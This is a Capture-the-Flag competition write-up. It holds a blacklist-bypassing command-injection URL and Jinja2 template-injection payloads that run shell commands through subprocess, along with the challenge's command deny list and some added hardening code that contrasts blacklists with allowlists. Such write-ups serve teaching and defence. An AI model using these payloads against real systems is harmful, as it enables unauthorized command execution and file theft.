2020 “祥云杯” Cybersecurity Competition
in Study on Writeup, Ctf
I did two Web challenges in the morning and then stopped; the rest were solved by my juniors. Team ranking: 172
First “祥云杯” Cybersecurity Competition
签到 (Sign-in)
Plain base64, decode it directly.
Command
Got second blood on this one. No extra bonus for that, and the point value dropped to nothing soon after.
Fuzzed it a bit and found the filtering was not extensive.
Used %09 (tab) to bypass the space filter and ca\t to bypass the cat filter.
Searched for the location of the flag:
Result:/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/pci0000:00/0000:00:03.0/virtio0/net/eth0/flags
/sys/devices/virtual/net/dummy0/flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/usr/share/perl/5.18.2/IO/Uncompress/AnyInflate.pm
/usr/share/perl/5.18.2/IO/Uncompress/Inflate.pm
/usr/share/perl/5.18.2/IO/Uncompress/Adapter/Inflate.pm
/usr/share/perl/5.18.2/IO/Uncompress/RawInflate.pm
/usr/share/perl/5.18.2/IO/Compress/RawDeflate.pm
/usr/share/perl/5.18.2/IO/Compress/Adapter/Deflate.pm
/usr/share/perl/5.18.2/IO/Compress/Deflate.pm
/usr/lib/perl/5.18.2/bits/waitflags.ph
/usr/lib/apache2/modules/mod_deflate.so
/etc/.findflag
/etc/.findflag/flag.txt
/etc/apache2/mods-available/deflate.conf
/etc/apache2/mods-available/deflate.load
/etc/apache2/mods-enabled/deflate.conf
/etc/apache2/mods-enabled/deflate.load
/proc/sys/kernel/sched_domain/cpu0/domain0/flags
/proc/sys/kernel/sched_domain/cpu1/domain0/flags
/proc/kpageflags
/var/lib/apache2/module/enabled_by_maint/deflate
Flag file location: /etc/.findflag/flag.txt
payload:http://eci-2zechif0ewh04tj7nhh9.cloudeci1.ichunqiu.com/index.php?url=%7Cca%5Ct%09%2Fetc%2F.find%3F%3F%3F%3F%2F%3F%3F%3F%3F.%3F%3F%3F
Only at the end did I read the challenge source and look at the filter list:
<?php
error_reporting(0);
if (isset($_GET['url'])) {
    $ip = $_GET['url'];
    if (preg_match("/(;|'| |>|]|&| |\\$|python|sh|nc|tac|rev|more|tailf|index|php|head|nl|tail|less|cat|ruby|perl|bash|rm|cp|mv|\*|\{)/i", $ip)) {
        die("<script language='javascript' type='text/javascript'>
alert('no no no!')
window.location.href='index.php';</script>");
    } else if (preg_match("/.*f.*l.*a.*g.*/", $ip)) {
        die("<script language='javascript' type='text/javascript'>
alert('no flag!')
window.location.href='index.php';</script>");
    }
    $a = shell_exec("ping -c 4 " . $ip);
}
?>
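The source above is a blacklist in front of shell_exec, and the write-up's payload slips through it because neither a tab nor a backslash-split word is on the list. The following is an added example, not code from the challenge or the write-up: it transcribes the two PHP regexes into Python (assuming PHP's /i maps to re.IGNORECASE and that "\\$" in the double-quoted PHP string is a literal $ in the pattern), URL-decodes the payload from the write-up, and contrasts the blacklist with an allowlist that accepts only a literal IP address and never hands the value to a shell.

```python
import ipaddress
import re
import subprocess
from urllib.parse import unquote

# The challenge's blacklist, transcribed into Python (see lead-in for assumptions).
BLACKLIST = re.compile(
    r"(;|'| |>|]|&| |\$|python|sh|nc|tac|rev|more|tailf|index|php|head|nl|tail|less"
    r"|cat|ruby|perl|bash|rm|cp|mv|\*|\{)",
    re.IGNORECASE,
)
# The second check: the letters f, l, a, g in order anywhere in the input.
FLAG_WORD = re.compile(r".*f.*l.*a.*g.*")

# The url parameter from the write-up's payload URL (decoded here with unquote).
PAGE_PAYLOAD = unquote("%7Cca%5Ct%09%2Fetc%2F.find%3F%3F%3F%3F%2F%3F%3F%3F%3F.%3F%3F%3F")


def blacklist_allows(url_param):
    """True if the challenge's two regex checks would let the value reach shell_exec."""
    return not BLACKLIST.search(url_param) and not FLAG_WORD.search(url_param)


def strict_allows(url_param):
    """Allowlist instead: accept only something that parses as an IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(url_param)
    except ValueError:
        return False
    return True


def ping_argv(url_param):
    """Build the argv a hardened handler would pass to subprocess.run without shell=True.

    Raises ValueError instead of returning anything for input that is not an IP,
    so a tab, a pipe or a backslash can never be interpreted by a shell.
    """
    if not strict_allows(url_param):
        raise ValueError("url parameter is not an IP address")
    return ["ping", "-c", "4", url_param]


if __name__ == "__main__":
    # Constructed sample inputs: a benign address, a value with a blacklisted ';',
    # and the write-up's tab/backslash payload.
    for sample in ["127.0.0.1", "127.0.0.1; ls", PAGE_PAYLOAD]:
        print(repr(sample), "blacklist:", blacklist_allows(sample), "allowlist:", strict_allows(sample))
    subprocess.run(ping_argv("127.0.0.1"), check=False)
```

The useful comparison is the last line of the loop: the blacklist answers True for the payload because it only knows about the space character and the literal word cat, while ip_address() rejects it outright. Passing argv to subprocess without a shell removes the remaining injection surface even if the allowlist were loosened later.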
flaskbot
Part of the source was leaked through the debug information:
/usr/local/lib/python2.7/site-packages/flask/app.py
...
# from line 46 onwards
    user = request.cookies.get('user')
    if user == None:
        return render_template("index.html")
    else:
        user = user.encode('utf-8')
        return render_template("guess.html", name=base64.urlsafe_b64decode(user))

@app.route('/guess', methods=['POST'])
def Guess():
    user = request.cookies.get('user')
    if user == None:
        return redirect(url_for("Hello"))
    user = user.encode('utf-8')
    name = base64.urlsafe_b64decode(user)
    num = float(request.form['num'])
    if (num < 0):
        return "Too Small"
    elif num > 1000000000.0:
        return "Too Large"
    else:
        return render_template_string(guessNum(num, name))

@app.errorhandler(404)
def miss(e):
    return "What are you looking for?!!".getattr(app, '__name__', getattr(app.__class__, '__name__')), 404

if __name__ == '__main__':
    f_handler = open('/var/log/app.log', 'w')
    sys.stderr = f_handler
    app.run(debug=True, host='0.0.0.0', port=8888)
<div id="wrapper">
    <section id="main">
        <header>
            <span class="avatar"><img src="static/images/avatar.jpg" alt="" /></span>
            <h1>Guessing Robot</h1>
            <p>Hi {{ name }}. I'm good at guessing numbers!</p>
        </header>
        <hr />
        <h2>Input your Lucky Num(0.0-1000000000.0)</h2>
Later I found that when the number submitted is NaN, neither bound check triggers and the code in name is rendered directly as a template.
Built the payload:
{{''.__class__.__mro__[2].__subclasses__()[258]('ls', shell=True, stdout=-1).communicate()[0].strip()}}
Fuzzing showed that *, ? and flag are filtered, so I built this payload instead:
{{''.__class__.__mro__[2].__subclasses__()[258]('cat /super_secret_fl\\ag.txt', shell=True, stdout=-1).communicate()[0].strip()}}
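Two defects combine in the leaked handler: the range check cannot reject NaN, and the user-controlled name ends up inside the template source that render_template_string compiles. The block below is an added example, not the challenge's code; it reproduces the leaked bound check, shows a hardened version that rejects non-finite values and bad input, and contrasts building template source from user data with keeping the source fixed and passing name as a context value. The guessNum() body is not on the page, so the assumption that it formats name into the template string is labelled as such in the code.

```python
import math

# Bounds from the leaked /guess handler.
LOWER, UPPER = 0.0, 1000000000.0


def challenge_check(num_str):
    """The bound check as leaked: two comparisons, anything else is accepted."""
    num = float(num_str)
    if num < 0:
        return "Too Small"
    elif num > UPPER:
        return "Too Large"
    return "accepted"  # NaN lands here: both comparisons evaluate to False


def hardened_check(num_str):
    """Reject unparsable and non-finite input, then test the closed range."""
    try:
        num = float(num_str)
    except ValueError:
        return "rejected"
    if not math.isfinite(num):  # NaN, inf and -inf all fail here
        return "rejected"
    if not (LOWER <= num <= UPPER):
        return "rejected"
    return "accepted"


def probe(inputs):
    """Run both checks over a list of form values; returns {input: (leaked, hardened)}."""
    results = {}
    for s in inputs:
        try:
            leaked = challenge_check(s)
        except ValueError:
            leaked = "ValueError"
        results[s] = (leaked, hardened_check(s))
    return results


# Template handling. Assumption (not shown on the page): guessNum() formats the
# decoded cookie value into the template source, which is why the payload runs.
GUESS_TEMPLATE = "<p>Hi {{ name }}. You guessed {{ num }}.</p>"


def vulnerable_template_source(num, name):
    """User-controlled name becomes part of the template code itself."""
    return "<p>Hi %s. You guessed %s.</p>" % (name, num)


def safe_render_args(num, name):
    """Fixed template source; user data only ever enters as a context value.

    A handler would call render_template_string(source, **context) with this pair.
    """
    return GUESS_TEMPLATE, {"name": name, "num": num}


if __name__ == "__main__":
    # Constructed sample form values, including the special floats float() accepts.
    for value, verdicts in probe(["5", "-1", "nan", "NaN", "inf", "1e309", "abc"]).items():
        print("%-6r leaked=%-10s hardened=%s" % (value, verdicts[0], verdicts[1]))
    print(vulnerable_template_source(1.0, "{{ 7*7 }}"))
    print(safe_render_args(1.0, "{{ 7*7 }}"))
```

The probe output makes the failure mode visible: "nan" is accepted by the leaked check because NaN compares False against everything, while "1e309" overflows to inf and is caught only by accident as "Too Large". A single isfinite() test closes both holes, and keeping the template source constant means a cookie value can only ever be printed, never evaluated.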
进制反转 (Bit inversion)
Wrote a quick-and-dirty inversion script for my junior:
# Flip every '0' to '1' and every '1' to '0' in ./flag, writing the result to ./output
file = open("./flag")
output = open("./output", "w")  # the original used mode "w+c", which is not a valid Python mode
for line in file:
    for i in line:
        if i == '0':
            i = '1'
        elif i == '1':
            i = '0'
        output.write(i)  # any other character (e.g. newline) is copied unchanged
output.close()
file.close()
Closing rant
I feel that py (flag trading) has become the norm in today's CTF competitions, and the challenges are highly repetitive; for many of them you can find near-identical ones online. I no longer have the exploratory enthusiasm for CTF that I used to have. Nowadays it is roughly: do a few challenges that don't waste time, wait for the writeups on the other interesting ones, and call that a competition done.